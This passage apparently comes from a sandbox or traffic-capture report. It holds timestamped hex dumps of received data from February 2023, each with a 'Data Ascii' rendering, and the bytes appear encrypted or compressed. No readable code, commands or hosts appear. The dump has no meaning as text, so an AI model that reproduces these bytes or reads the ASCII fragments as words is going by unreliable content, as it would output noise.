a8 7d 61 89 d5 b5 03 4d 04 a1 9b a1 25 e4 b9 09 51 ad 4c 6c 9f 81 b6 e0 9b 5a ff f4 12 87 3b 4d 76 37 40 cb ba 4f e7 66 44 ed cb d9 59 42 67 2f df 2d
                                                                                                                  Data Ascii: k"GX1aw*gDS1RzWtOjzQUEA32pjM^b7@.rW5L,'DZNg9Kh%YV8|vV B/HV%8 xP<v*C+}aM%QLlZ;Mv7@OfDYBg/-
                                                                                                                  2023-02-13 17:58:09 UTC166INData Raw: 26 94 db 79 d3 27 c8 b2 22 c0 ad c2 9d 68 80 88 ff 0e 0c 28 15 6b 12 7d c3 fd b5 85 8f 41 8b b7 84 bd 8e e3 66 4a 93 b9 9c d5 2b a0 0f 97 15 54 cf 95 9b 13 69 5d 93 b1 35 8e b1 05 73 44 d0 10 3d 2a d6 c4 8e 01 ad 17 14 d6 4e c9 7c 02 7d 95 f3 aa 8a 93 0e ab bb 00 13 68 bd 6a 95 78 91 a3 7c 9a 76 8b 25 6e 04 61 fd 61 6e a9 9f cf 2e d4 43 27 2a 9e a2 61 1d 4e 84 79 b0 44 5d 65 fa f0 ed 27 c3 30 5b f0 04 ca 0b a1 bd 83 6e b9 b5 e3 b7 b6 6b 4b 35 86 fd 57 f7 00 22 e9 a4 82 73 e5 cd 5a 9e 20 e1 4a 2f e9 51 bf 47 b3 da 30 4a dc 3c 37 92 22 6f d9 f2 cf e1 24 91 ef b8 0e 09 46 f3 63 fc 7b 17 39 a4 f5 b7 67 a0 e6 32 10 c8 42 74 c2 14 8c 23 4e 33 ce 36 99 16 21 c4 a5 fc 73 19 c9 bc 15 4a d1 3f f0 6d b4 94 ed b3 ed 63 99 a0 18 b7 6f 96 2f b0 54 fb 21 1b 59 76 54 91
                                                                                                                  Data Ascii: &y'"h(k}AfJ+Ti]5sD=*N|}hjx|v%naan.C'*aNyD]e'0[nkK5W"sZ J/QG0J<7"o$Fc{9g2Bt#N36!sJ?mco/T!YvT
                                                                                                                  2023-02-13 17:58:09 UTC167INData Raw: 07 7b ee a4 50 9b 3f 60 02 5e 4e e5 3a 45 9f 8f 59 0c 2f 24 e4 56 bd 0f 17 23 c5 e9 fe 61 02 e0 3d c7 34 52 f9 ea d1 c4 53 5d 56 36 a9 a7 97 e1 4d 56 6b b2 60 ea 80 18 ed 47 38 68 aa 77 36 93 f5 7b 62 95 aa 25 32 ae 09 1c 22 b8 ba 13 78 3b d9 e8 8a 56 46 67 a3 c5 8f a9 ed 09 55 a3 8b fa b9 e5 54 b3 f4 4c 33 d0 50 54 26 d0 7d d2 30 3b 2f 2d 20 12 f3 f3 e7 a8 a0 c2 b4 ba 49 90 86 3e 5e 47 b5 f5 56 ec f5 b3 5b b9 77 ec 9a ba 3b 74 77 70 17 b5 f1 f6 e2 55 b9 ec 77 15 45 ac cc 87 b1 12 0e 0c e3 6c cb 2d a2 e1 59 e1 d2 52 38 4b 2b ca 84 f7 e8 6b 35 63 6e ab 02 3c d5 ff d4 07 df 73 cf 55 14 1e f2 91 53 ce b7 b9 02 31 51 c7 9b b3 c4 05 ac 6d f3 b1 01 fe 61 fb 09 55 9a a9 a5 00 b9 64 1c ec 38 7a 78 08 9a bf 22 5d d4 89 f6 38 70 54 dd e2 22 db 12 1e 41 5f c8 64 85
                                                                                                                  Data Ascii: {P?`^N:EY/$V#a=4RS]V6MVk`G8hw6{b%2"x;VFgUTL3PT&}0;/- I>^GV[w;twpUwEl-YR8K+k5cn<sUS1QmaUd8zx"]8pT"A_d
                                                                                                                  2023-02-13 17:58:09 UTC169INData Raw: 1a 55 15 56 e9 38 7c e9 f4 56 98 95 85 74 b2 c1 0a bb ad 3e 43 1f 5d 3f 44 dd ed 10 19 c2 0f 44 26 08 74 d4 ca af 1c 35 78 08 c8 8a c4 fe 4d d5 40 e9 05 21 a5 8e 81 75 9b 4f 33 8a c8 fc b3 bb 47 4e 05 2a 05 cb 06 db 00 b4 df bf a2 04 ba 30 1b f6 0c d8 f6 15 cd f9 03 43 39 13 65 97 b0 87 cb b5 e3 44 0b 1e 89 d1 0c 44 18 c4 0c 3c 78 4f 22 8e a5 b0 77 86 3f 65 fa 76 97 c0 ca 41 30 b8 c5 fd 9f ef 6a ad b5 07 6f 12 7a 95 fb c2 b1 11 a3 56 30 8e 95 3a 8a df 86 3f f3 28 75 66 79 76 3f 4c d3 96 3a fd d1 99 41 27 d4 19 b9 8d 3e a7 5c 7f dc dd e4 47 b2 6e 2e b8 a7 82 e6 c4 2b 46 b9 38 f5 35 ac d9 b1 12 19 ae 6e eb 4c c7 e8 07 2d 33 81 30 16 42 86 ac a8 4f 59 95 63 2e 08 4a a6 bd 49 33 04 75 71 2f 63 f9 42 ec 6d e2 72 3a 4b 48 01 68 87 80 3e e2 6e 01 80 b3 74 37 5b
                                                                                                                  Data Ascii: UV8|Vt>C]?DD&t5xM@!uO3GN*0C9eDD<xO"w?evA0jozV0:?(ufyv?L:A'>\Gn.+F85nL-30BOYc.JI3uq/cBmr:KHh>nt7[
                                                                                                                  2023-02-13 17:58:09 UTC170INData Raw: 9f bd 55 44 f3 0d 41 ae 57 a0 1e 17 f3 8e 73 7d d7 51 22 0c b4 98 63 c5 00 e9 43 b7 c8 1a 8a 7f 4c d2 e2 e9 62 77 72 36 de 31 1d 9d f7 ad 60 c2 b7 7f e8 00 78 d4 89 f4 fa c3 40 b4 dd 8e 01 b6 30 b5 77 2d 6f 36 48 83 8f 61 ad 7f 1d 28 6a 7d 08 d0 97 da c2 ac f8 87 a9 b1 e9 70 8d e8 6a cf 9e 87 8d fa 9f ba 31 0a 22 a4 a9 fb f0 02 f5 1c f6 93 18 17 83 70 d9 80 3d 44 be 13 54 db 27 2e 4b 69 98 10 7d 5e 99 e9 47 14 b2 e5 62 0c f2 33 f2 a2 98 bb 4a 27 2a b2 22 41 dc 5d f7 4e 5b 23 94 58 05 f9 d0 6e 71 86 f8 77 49 36 9e 37 8d 73 55 1e ab d4 92 7c 68 fe 3f 03 74 01 56 85 bf ff a8 d6 a3 95 61 6f 49 1d af 88 c8 33 7e 81 02 cd ba 89 4f da d2 87 8c d1 6b 7c bd ef f3 74 a8 9a bc c5 e8 fa ce 62 60 56 5b 32 fe ec db 6a 4b 15 4f f0 80 40 6e 2b 6a 04 b7 4c 79 37 4a e6 dd
                                                                                                                  Data Ascii: UDAWs}Q"cCLbwr61`x@0w-o6Ha(j}pj1"p=DT'.Ki}^Gb3J'*"A]N[#XnqwI67sU|h?tVaoI3~Ok|tb`V[2jKO@n+jLy7J
                                                                                                                  2023-02-13 17:58:09 UTC171INData Raw: 70 e5 46 de ce c5 1b e7 6b 8e eb 15 cd b4 9b c3 31 40 5c 69 89 9a c3 e2 cc a6 4d 5a c0 4a e4 e8 b4 8d 19 8c bc 33 a8 f9 eb 6f e3 c6 1e ff 0e 87 12 ac e0 bf 54 c5 f3 1d 51 cf 67 44 df 89 1f 31 46 c3 21 31 06 64 97 ef ce 71 da 3d e3 91 9d 4c f3 59 26 ed 8b 78 13 cc 1b 53 7b f0 39 a6 53 d3 e8 f6 83 94 05 42 d8 50 4e b3 bb 50 5a 95 5e ed c3 71 ba 34 27 e4 78 fa 4a 42 c2 26 87 2f 2c 30 a3 da 7b 2d d9 8a 1a fe 58 b2 27 e3 01 b0 da ef df 55 45 bf ef 69 b0 94 1c 69 b8 bc cb e9 e1 e2 1d 64 e0 34 0c b6 c6 ec 7a 62 09 39 ef f8 92 64 21 d9 6d 01 79 19 27 a1 fa f1 67 ed 3a 72 75 5a 6f 64 7d c6 35 08 34 b9 3f 12 9b 66 0a fb b1 6c d8 bc 14 7b 72 a7 6a 3f a9 b6 0e e8 88 df bb ae 58 9c 58 58 46 14 83 4a a9 75 d2 53 01 44 a8 7f c1 d1 f4 ce 3a 07 fa 7f 5f b2 41 92 0b 95 23
                                                                                                                  Data Ascii: pFk1@\iMZJ3oTQgD1F!1dq=LY&xS{9SBPNPZ^q4'xJB&/,0{-X'UEiid4zb9d!my'g:ruZod}54?fl{rj?XXXFJuSD:_A#
                                                                                                                  2023-02-13 17:58:09 UTC172INData Raw: f8 66 71 87 f2 fe 21 ba 7d ee 5c 88 48 f5 94 38 eb ed 90 73 be b8 18 5b 9f cf ca b0 cb ca 9d ed 22 1b dd 1d dc bf f3 62 2a b8 66 b7 8d f7 39 1f a5 6f 3b 37 8d d5 7e ef de b7 40 5d 09 a3 7e cc a0 16 d2 ab 00 a2 3a d9 a3 2a 33 33 cc 27 15 4e 08 e8 0f 40 c1 5f 0f df 96 bf 60 34 a6 24 2b 77 ee 19 df b2 b9 86 c2 81 f7 ae 9e 6e dd ef 0a 03 f9 b9 5e 2f 72 6b 04 cb 0a df 53 d5 a4 bd fa 70 33 ab be 4d eb 37 e0 79 0e ed be 67 b3 4f 18 13 bc 4a b6 73 ad 06 89 38 62 10 3e 29 fb 18 50 56 b5 cf 26 22 26 50 ff db 55 c1 d6 4e 57 0e c2 03 95 d3 78 cb a4 34 8d 8a a0 bc bc 79 19 63 da 65 75 5a 12 98 da 07 84 75 a1 cd 71 95 cb bf cc eb aa b7 fd 74 07 c4 28 2e 83 f4 a7 07 1c 39 4b 97 67 e7 e4 b4 b5 f2 65 62 59 97 65 aa 84 02 bc 8e 3c 39 df ec 46 35 36 77 c7 28 b0 82 19 d1 30
                                                                                                                  Data Ascii: fq!}\H8s["b*f9o;7~@]~:*33'N@_`4$+wn^/rkSp3M7ygOJs8b>)PV&"&PUNWx4yceuZuqt(.9KgebYe<9F56w(0
                                                                                                                  2023-02-13 17:58:09 UTC173INData Raw: 11 3b 8f e6 15 96 27 e5 6b 52 6b b5 99 fe 84 6f ce 96 9c 31 10 d0 2b de 64 95 e5 d3 e3 4b 6c 81 46 9b 96 ff dc db 56 41 cc a1 05 86 35 d3 8b 26 d2 a5 5d bd 6d f4 23 32 88 5f 1a 9d a3 8d a3 7f 8d d0 70 78 a3 47 f1 13 58 b9 e5 b3 f2 4d 5b 4c e2 42 a0 5f 68 a2 d0 5a 10 82 eb aa e1 61 db 87 b8 d9 47 2d 19 4e 4a 5b 1a c1 5d c2 78 eb 9f 4f 1d df e1 f8 09 80 ae b2 c0 90 21 47 f6 a0 b0 6c 53 cf b3 5f 3d 7a ab 5f 20 b0 5f 99 4f 99 e9 dd ed 55 77 e5 bd b9 31 c2 95 a6 b2 68 4b 59 85 a4 f6 cd c5 eb 05 22 62 84 07 e0 24 36 05 3e f1 b1 9e f9 0f ef 26 23 7b cb 92 35 1d fd 9a aa b8 94 89 56 0b 87 08 f9 63 5c bb 0f 63 db 2a 82 47 b2 ab 1f 0d 2a 48 98 fc 66 f0 c7 09 8d fc 12 3f 16 f1 1d c7 16 76 27 f7 fa b9 12 45 1d f3 4f 71 34 dd 2e db bf fa 32 31 e3 d9 8d 4d 31 5d 46 de
                                                                                                                  Data Ascii: ;'kRko1+dKlFVA5&]m#2_pxGXM[LB_hZaG-NJ[]xO!GlS_=z_ _OUw1hKY"b$6>&#{5Vc\c*G*Hf?v'EOq4.21M1]F
                                                                                                                  2023-02-13 17:58:09 UTC175INData Raw: 5d 48 d0 00 2a 15 a1 f4 3e 00 e4 a7 e3 25 02 27 79 b0 dd 46 79 0a 6b 06 cb 0a d7 2e c0 a3 31 28 ae 83 99 4d 01 df 5a a4 6c e7 a0 ee 5d 29 79 96 93 94 b1 c5 fe 5e 81 d2 5e c3 05 94 1b c7 3e 5c b3 2f 5b 78 08 7c 10 13 34 9f c9 83 e6 a3 d1 f8 28 32 ec 9c c7 12 93 a9 46 e6 af e0 ee d7 50 04 b4 25 bf 6f 57 e4 76 c4 2f 6f ef 7f 5c d2 12 be 55 29 1b 95 b8 7b f6 a8 a0 84 50 9a a2 e5 0e b3 5e 9e ea ad 4b 36 01 ae 9f 37 e9 55 0f d6 70 c9 1d 98 38 cf 0a 51 45 53 b8 4c 85 33 1e 9d cf f6 83 c5 a1 b6 d1 43 a8 4a f1 88 68 d0 9e 76 42 1d e8 c8 f4 09 b8 a2 14 f6 87 46 58 4f f6 01 f9 50 21 94 9a 0a 71 0a 34 fc df 57 9d 38 bc cb 5f ad 71 85 03 1b 35 a1 6d de ab 51 f0 a3 1e bf 7a ff a0 77 d1 ba 7d 48 c8 75 fd 1c e2 73 7d 69 cd 1f 5a d5 40 2b 97 8e 72 8b 32 58 83 89 0b 52 17
                                                                                                                  Data Ascii: ]H*>%'yFyk.1(MZl])y^^>\/[x|4(2FP%oWv/o\U){P^K67Up8QESL3CJhvBFXOP!q4W8_q5mQzw}Hus}iZ@+r2XR
                                                                                                                  2023-02-13 17:58:09 UTC176INData Raw: 82 3a a2 7c 52 e1 74 42 bf 40 ed ba d3 4e af 89 78 77 d4 bc e7 aa e6 1c 0b 1f 31 fb 98 1c 74 d3 32 0c 37 58 29 2b 23 90 28 ed 97 96 6c 70 32 d7 f2 ae ae 2f 67 6c 92 c9 be ca 55 f1 23 53 fa 48 2e 2e fc 4b 10 57 0f f7 21 a3 76 d1 ee c0 83 7d c0 08 06 b8 fe 4c 65 d0 4d c2 ec e0 a8 57 80 76 ca f7 6d 6b 70 73 ad 7e b3 1a aa e4 41 2b 04 8d 32 49 2f a7 75 b8 20 d8 a5 94 dd 6d e7 8c 43 a7 d2 f8 c9 f5 00 7f 6d 74 b5 a1 8d 58 14 89 35 19 1f 98 08 17 78 06 10 26 53 b4 9d 32 4a 51 0f cf 8d b3 7c 28 3c 01 f6 e9 45 bc 02 40 62 19 ba f3 b5 fd 96 35 be 2d 03 cd a0 95 91 ea 8b 4f d8 6b da d5 13 12 6f 4e 65 8c 65 55 b3 71 37 c6 1d 15 cb dc e0 2f 2e bb 78 14 87 fb e7 a4 0b da 96 c0 62 ed 3b ff e9 cf 41 7a db 5a db 9f 27 d9 1a ae c0 8b 66 0c b1 13 c8 7d b4 23 af 8e 56 67 04
                                                                                                                  Data Ascii: :|RtB@Nxw1t27X)+#(lp2/glU#SH..KW!v}LeMWvmkps~A+2I/u mCmtX5x&S2JQ|(<E@b5-OkoNeeUq7/.xb;AzZ'f}#Vg
                                                                                                                  2023-02-13 17:58:09 UTC177INData Raw: c5 be 24 10 19 27 68 ad bc d0 3b 96 40 13 37 93 f8 da c2 ef 94 2d 8c 3c d3 5e 83 51 40 30 01 da e8 23 31 f4 2c b8 3d 5d 5f 08 4b 45 e0 6a 5b 77 ae a6 af 00 40 71 5e 75 09 25 19 c9 72 0f 2d 38 36 56 08 cf 8c ae aa c9 34 45 08 c7 7a 24 9c 63 42 86 1c 7c c1 ff aa 29 06 fd 30 53 25 43 ec dd b5 f7 65 e5 d4 2e c8 cc bf ac 34 33
                                                                                                                  Data Ascii: $'h;@7-<^Q@0#1,=]_KEj[w@q^u%r-86V4Ez$cB|)0S%Ce.43
                                                                                                                  2023-02-13 17:58:09 UTC177INData Raw: e5 60 a2 a1 1a 1e b4 40 72 07 0d 08 d8 6b f1 fd 34 27 d6 9f e4 23 07 38 38 5a b2 a1 cd a0 4b d4 f7 af da 5f 4a 42 b8 f5 c1 5a d7 88 d1 e7 8e e9 bd 3c 79 c9 d4 ca a8 35 79 8a 17 17 59 1f 50 f0 3e 2e 50 a6 8a 25 f6 a5 b1 93 36 66 cd e3 16 e0 75 e6 92 7a f8 10 45 eb 10 5c 20 cd e4 57 2d 93 55 6b f8 a6 ef ef ed b7 f9 a7 9c ab 6a fe e3 96 e1 18 f4 ec 44 98 3e 5b 9d e6 0d 9d 48 4c eb 97 18 bb a5 92 3f 96 c4 2b 06 4d c7 18 e7 03 3d 45 dc 1b ea 4c 7d 9e 9f 61 74 1a 91 f4 1b ff 92 ca 70 13 e0 c7 3a 38 ba 63 97 bc fd a8 ca af bc ff 32 47 53 f3 f8 ef 81 d5 d1 82 c9 06 e3 9f 33 6e a5 d0 ed 55 f0 e1 c1 2a 98 47 78 2a 09 69 63 9c 6e 85 dc 39 8f 12 5f 24 b1 b1 98 57 6a 78 bf 52 e4 ac 2a b4 75 28 a3 f9 66 42 2f c8 16 10 68 d3 c0 f7 01 42 71 09 f5 db 55 46 05 00 19 99 89
                                                                                                                  Data Ascii: `@rk4'#88ZK_JBZ<y5yYP>.P%6fuzE\ W-UkjD>[HL?+M=EL}atp:8c2GS3nU*Gx*icn9_$WjxR*u(fB/hBqUF
                                                                                                                  2023-02-13 17:58:09 UTC178INData Raw: 61 bd 81 c8 83 fe 6e 6f ab 84 6b bb 1d 01 35 e4 b0 4c 0b f7 54 c4 7a 80 b5 c5 54 e0 18 19 f5 46 16 5b ea b2 9b f2 e5 c2 27 26 fa 85 bb f9 5d 6c f5 d7 e6 39 03 c4 30 31 b5 1d 94 95 3a 6c ea 30 2d ef f1 64 a2 be 27 62 9d 61 3a ae ec 12 75 ab 0c fc e2 a6 c5 55 f0 a8 a8 18 d0 49 40 ed f4 f3 d1 42 ad a5 a3 d7 48 f5 23 07 34 d6 06 cc c4 22 29 22 17 11 e1 24 db b3 97 6c f2 4a cb 70 69 69 1d 22 98 b3 6f 4f 81 5a c2 ed ab ef 39 7f b4 cf 01 ab df f1 19 2f 29 de a6 eb 60 b2 72 8c 16 b7 0a 7b 1a 1b f3 34 66 89 ea 23 a3 b5 01 25 c8 f0 b0 fe b4 79 dc b0 2d d5 ae 73 6a e0 f6 7f f1 45 ce b9 82 6d e5 26 14 0a d4 f1 63 c8 1a 2c 9d 12 83 d7 ad 7b 85 75 dc 65 5c b6 e1 97 eb 4d 8b 85 ee 63 6a eb ab 0a 04 53 e2 43 93 62 91 df 52 4e ac 41 d5 92 6a 19 e0 ac 7f 05 ed df 11 6b 1f
                                                                                                                  Data Ascii: anok5LTzTF['&]l901:l0-d'ba:uUI@BH#4")"$lJpii"oOZ9/)`r{4f#%y-sjEm&c,{ue\McjSCbRNAjk
                                                                                                                  2023-02-13 17:58:09 UTC180INData Raw: 3f b2 a2 b1 e5 46 57 10 86 aa 7c e1 cb 00 cc f7 f9 97 dd 4d f5 85 60 0c 02 32 85 23 d4 0a 6f b4 99 0f b2 22 38 25 98 c3 58 ab a4 66 2a 76 6b 55 39 d1 c6 64 83 14 f5 36 c7 ac f2 9f 2f 0f 41 dc 8f 5c fb 7f 6b bc d2 da b9 2a e6 b8 07 0c 30 cb 83 18 cf ca e3 85 8c 0e 3b 7a 44 89 84 82 f6 7b a2 ca 62 3c 22 1e ee d3 d6 d4 3e 8d ac 04 f0 a4 66 80 20 c4 05 f7 b9 16 70 70 c7 ce 3f ec 3a 7e f2 2f a9 63 93 23 ba c7 80 4a 3b 61 3d a3 ea 8e c9 9e fa 42 a8 08 47 e6 c9 3c 59 96 b1 1e 28 c5 92 b1 b1 8a 47 68 a7 83 88 c8 8d 8e 3a 10 83 99 58 2f a5 cb c1 3b 03 c0 3f 19 0c 2b ca 11 0b 60 a8 b5 92 fe d7 24 28 d8 20 c6 f3 da d9 42 dd 50 59 28 5f a6 4d 9a 14 2b ca f6 57 65 15 93 9c 22 2e 5d 04 b2 9d 4d d0 45 4e fc 65 08 61 13 2d df 69 96 9f b4 b0 eb 1f 49 1f 7c 0f 62 77 9f 56
                                                                                                                  Data Ascii: ?FW|M`2#o"8%Xf*vkU9d6/A\k*0;zD{b<">f pp?:~/c#J;a=BG<Y(Gh:X/;?+`$( BPY(_M+We".]MENea-iI|bwV
                                                                                                                  2023-02-13 17:58:09 UTC181INData Raw: da 10 ae bb 60 03 f0 b8 10 82 1c fa 0f 4a 2c c6 5a a2 04 ff 66 1c f1 b0 0a 97 9f f6 88 1f 66 bb a9 2b de 1b 00 0f 02 64 0a 20 ac 3c c0 66 77 1f 9c b3 ea 6a b3 30 15 5e 59 33 0f 5d 56 bc d9 65 6b 1f 44 c7 f3 98 30 3c be c6 bf 1e 3f 76 42 60 7a 44 d4 19 53 8d 96 58 66 52 61 bd 54 6d 5e b7 64 85 66 cc 3f 7c ad 57 f3 64 6c 88 4d 23 d6 e9 2b b1 4a 6e 00 f3 3a 7e a6 db 61 de ff 39 f1 a7 70 4c e8 ba cd 1f d4 00 b6 0f 8a a0 2f 13 65 ef b2 6b b7 9d 47 90 1f 1c 44 79 c7 3d ce 98 ae ee d4 81 a9 67 c8 1f bf f9 e8 48 de f3 e3 a6 72 b7 c6 37 d2 0f 6b 5b 42 48 9a ef 7a 36 23 df 24 de 84 16 8d a4 3d 15 08 80 22 19 fb cb 10 fb 8d 5d 9b ce 7d 8c dd 30 d7 c0 8c 05 09 fc 8b 3e d7 e0 f9 f8 c5 a5 a5 63 ac b5 f7 47 ab 18 e3 2a 1f e0 dc 4d 98 bc 03 71 e9 d9 dd fa 43 8d 5f dd e1
                                                                                                                  Data Ascii: `J,Zff+d <fwj0^Y3]VekD0<?vB`zDSXfRaTm^df?|WdlM#+Jn:~a9pL/ekGDy=gHr7k[BHz6#$="]}0>cG*MqC_
                                                                                                                  2023-02-13 17:58:09 UTC182INData Raw: 64 05 3a 18 f2 3c 6d 8b fd fe 97 77 61 e1 0f 97 c0 0e c3 3b d2 50 58 97 a6 29 9e ec c5 d2 1e ec aa 71 86 0e 05 e9 b0 41 84 4b ca 04 b5 ff 0a 46 00 3f 12 09 67 b3 2c 0e 07 44 b7 92 38 40 65 d8 62 95 96 d6 d6 34 2e 98 de 5f d5 1f c4 fd f6 c9 1d 35 e5 4b 06 03 e3 0c fe d3 e3 b4 1e 39 16 45 d2 3f d4 b4 c2 da 62 09 9a 83 22 e8 5d 8d 09 b8 5e ff 0a 31 02 3f 56 17 59 bf 4b 89 d5 6f d7 85 b1 a7 e0 d6 23 c1 50 c0 1a be ed 4b 00 65 1b 7a d0 7d 9f f7 ef 23 f7 57 1a 87 1d 2d f6 9f 0b b5 ae 5b 95 2b 18 f9 05 4a c2 6d e2 38 10 26 29 8c fb df 04 26 b2 eb 63 3d 3b 31 4b ca 95 23 b9 f9 f9 f4 30 51 60 16 6a 66 a0 9a be 3c 8a ca 3e 7e dd f7 4c 45 c0 8d 4d e9 dd a9 5f 90 6e 34 63 f9 be 09 99 d8 ed 93 57 61 fc c5 82 29 8c ec 3d ec 7e 54 63 0b f7 8f 76 96 6d d2 27 8a c3 ff 9c
                                                                                                                  Data Ascii: d:<mwa;PX)qAKF?g,D8@eb4._5K9E?b"]^1?VYKo#PKez}#W-[+Jm8&)&c=;1K#0Q`jf<>~LEM_n4cWa)=~Tcvm'
                                                                                                                  2023-02-13 17:58:09 UTC183INData Raw: 47 9f 23 e4 fc 3d 27 8c c4 90 15 21 5f d8 a6 82 fa 15 30 ab cc 56 5d ef 0a 96 42 3c 42 9e 91 8b 17 62 ad ee 11 4d bc 16 d1 b1 91 ae 23 60 1c d5 56 57 2b 75 23 cd 62 29 8f 6a 23 54 3e 43 ff 8c e2 15 d0 9d 39 90 c5 57 11 d2 44 15 74 fd 8e ab 72 4b ff 75 10 9d 4f 72 34 7a 0b 7a 6e f7 1e 62 31 1e f9 3b c9 72 e7 59 3e a4 71 f8 ac 3f 3a 31 cf 58 34 f4 d6 54 c2 a2 a8 9e 75 26 c8 3a a0 2f 48 92 27 17 7d 58 58 75 e2 63 a4 e6 46 36 8e 71 4d 95 1d e2 71 df 8a f4 73 5d a7 92 d1 43 8a 1b 72 42 f3 2b 90 19 c3 00 d1 0a 22 11 c6 47 92 68 4d 73 9b 6a 4d 59 7d b4 25 f5 9c 26 2a b7 0e 86 ba b1 76 c5 10 f5 cb 41 f5 ce ce 69 3a 65 37 f6 41 35 20 8d 19 6c 89 3a 14 49 08 6d 38 b5 01 fc 1f a8 8c c0 48 d5 71 1c 58 48 1a 76 7e 63 e8 c8 12 0f 5f 6b a7 72 5c 8f 73 9e 40 fa 5b e1 01
                                                                                                                  Data Ascii: G#='!_0V]B<BbM#`VW+u#b)j#T>C9WDtrKuOr4zznb1;rY>q?:1X4Tu&:/H'}XXucF6qMqs]CrB+"GhMsjMY}%&*vAi:e7A5 l:Im8HqXHv~c_kr\s@[
                                                                                                                  2023-02-13 17:58:09 UTC185INData Raw: c0 d8 ec 61 7f 2f 5f c1 d2 91 47 8a a6 8c fa a5 d6 b3 2a 04 36 93 4a 55 02 01 f2 a3 03 4d a8 f8 83 be d3 bf fa 5c f4 bd a9 58 17 69 24 2c 4e 02 2b ac 4c e9 ff 1f c3 df b3 cc b6 8b 18 7b a3 de 04 25 c8 90 67 47 b9 6d 2c ee 4b 33 09 3d 50 4b 7a c0 f7 fc c5 0d 8f 43 f3 2a b3 70 77 19 32 87 e9 00 cc 91 20 a4 15 1b 6e 06 d9 91 91 a5 79 c0 37 7d 25 df 95 c5 a4 d3 19 58 eb 62 69 40 58 c5 19 b0 d2 4d cf 02 50 72 4e 2e ac b3 da 16 db cf 62 f8 d8 d3 82 fc 7f 68 22 d2 fa af 32 26 cb 82 a9 e2 76 c0 0d 81 41 f8 29 e2 7b 94 6d cf 49 98 66 93 b5 ae de b5 47 43 7d c5 df 8d 5c 85 3c 98 49 c2 88 d3 64 80 fa e7 ca 9c 14 0d 79 4c a2 1c 8d c5 8b e3 87 b2 57 a9 e2 25 45 5e 83 73 0a 6d 40 82 7d c0 da 0b 94 c8 b7 90 3e cb 7d f6 e6 db e4 cf 7d dc 63 a8 db 1d 53 4c 4e 3c e7 5e 88
                                                                                                                  Data Ascii: a/_G*6JUM\Xi$,N+L{%gGm,K3=PKzC*pw2 ny7}%Xbi@XMPrN.bh"2&vA){mIfGC}\<IdyLW%E^sm@}>}}cSLN<^
                                                                                                                  2023-02-13 17:58:09 UTC186INData Raw: 16 07 28 98 3e ae d8 14 c2 15 d8 b5 02 d5 ad fd 31 f8 34 0a fb 48 6d 81 02 e8 19 87 0e 0d f2 aa 33 37 9f 2a d3 db f1 b2 a5 d8 b0 7f 53 58 0a 6e aa 9a 48 19 5b e2 1c 10 32 27 78 46 27 cc d6 62 a0 27 b0 f9 9c 81 54 dc 96 4c 99 e2 95 dc 18 27 c5 a9 70 72 6b 82 dd 8c fd 61 50 8e 95 e2 8e 01 27 a1 16 9d 22 90 93 90 a5 08 2c 42 22 aa 21 85 d6 e3 e9 fc 6a 93 75 63 35 19 f4 ac b0 77 c1 a1 69 c4 3b b7 8b ee c7 73 59 a7 20 b3 d4 75 61 e3 30 06 b7 d3 42 96 b6 72 dd fc 58 93 28 c8 fa ec 4a 5b 45 42 9a a6 58 88 7a 14 f9 f6 3a 5d 4f bc e1 3f 06 47 08 ac a7 3c 69 53 9c 77 34 35 b1 ad 9c a0 00 7b a3 0d 86 dc 0e f3 ac 63 da 54 55 89 7e af c5 04 d6 82 84 d4 1d a0 24 5b 50 fd 9d e4 00 60 04 b0 29 14 ea 83 27 e1 8a 0b 0a 13 3c 36 1f b2 87 39 ca ff 41 d2 6e bf dc 55 22 50 1d
                                                                                                                  Data Ascii: (>14Hm37*SXnH[2'xF'b'TL'prkaP'",B"!juc5wi;sY ua0BrX(J[EBXz:]O?G<iSw45{cTU~$[P`)'<69AnU"P
                                                                                                                  2023-02-13 17:58:09 UTC187INData Raw: ef c4 f0 1e 87 c0 c6 73 ea 40 31 2f 58 0d 30 d6 86 69 ec 21 a9 ad 84 22 8f 46 93 4d 8c 55 2b 05 ad ec ec 1c e9 ba 95 be 72 53 46 82 4f 4d 43 df 39 37 c0 85 68 5e 62 53 81 2d bb fe c3 c3 e3 f7 c7 c8 f6 ab ea 17 64 c1 f7 5b 75 13 bd f1 aa ba 18 23 a6 39 15 28 fc 36 ed ec 5c f2 2b d6 f6 f8 d3 cc 65 f5 fb 8f d6 ee 38 85 04 56 16 d6 72 c5 e3 79 f6 86 6b ed 0f e8 46 a4 06 b0 37 09 ec c6 af ff d5 ae 48 e6 da 1c 17 64 02 84 c9 70 61 04 66 77 5f 94 f4 ab a8 c0 f0 cd 03 ff 51 3b 8d e7 21 6f f9 cf cc 89 1c 64 cb a3 22 b5 cc 79 05 81 2b 49 c2 ee e2 d3 c0 9c cd e8 f1 31 79 e2 04 9d 66 28 7c de 96 c2 1e cf 98 70 15 c2 96 b8 97 f6 22 8e 9a 8e 8d b1 77 e1 b2 b5 13 49 b8 44 e8 c6 02 72 34 fa 60 99 ab 3a 68 75 7f 20 a4 2e a6 cb bc ac 9d 6e 39 3e 33 48 d6 f1 c3 d8 10 3d 6b
                                                                                                                  Data Ascii: s@1/X0i!"FMU+rSFOMC97h^bS-d[u#9(6\+e8VrykF7Hdpafw_Q;!od"y+I1yf(|p"wIDr4`:hu .n9>3H=k
                                                                                                                  2023-02-13 17:58:09 UTC188INData Raw: f1 1a 8f 3d 32 67 1b 46 c7 cd 07 0f 3e 6e 3d f8 39 c7 65 39 01 01 f1 b2 93 0a 8e c3 bd 58 6b 56 59 63 fa 27 0c 6b ec d3 8c a5 77 a0 eb 99 4a 8a 58 86 66 7b a2 35 3c 26 db 46 56 d3 cd 95 72 8d af 86 1a 12 4d 8b c7 72 1a 35 f5 0e 40 68 70 11 72 73 c6 07 4f 53 b6 0a c1 9f e9 3b 73 14 15 2b 55 03 9b e6 59 c7 e5 9b 60 30 01 f8 ad 03 6a b6 67 63 60 f4 59 e7 9c 53 aa 89 07 51 10 f7 13 f5 4d 4c eb 27 58 6d 3b 5d b1 68 47 ef 2d 6b b0 ed ea ed 9a 30 41 b8 ba 94 2d 2f 57 3d 46 f6 b3 d3 24 49 31 05 6f 6d 6f e5 dc 53 1d 06 00 4f 4c 0b b6 be e4 c1 c8 ea 66 ed 5f 3e 04 cf b1 c2 d2 66 bb 9c 0e b1 c7 3a cb ac 3c 52 df e6 6c 11 f6 5e 52 e6 de 6d 7e 5e b0 28 f5 8e 78 7c 71 a1 91 08 13 e9 42 3c eb 5d 7d 43 b1 bb 43 d1 a8 7e 9f ea dd a9 59 b8 a4 35 e9 3f de 2e 75 90 89 22 e6
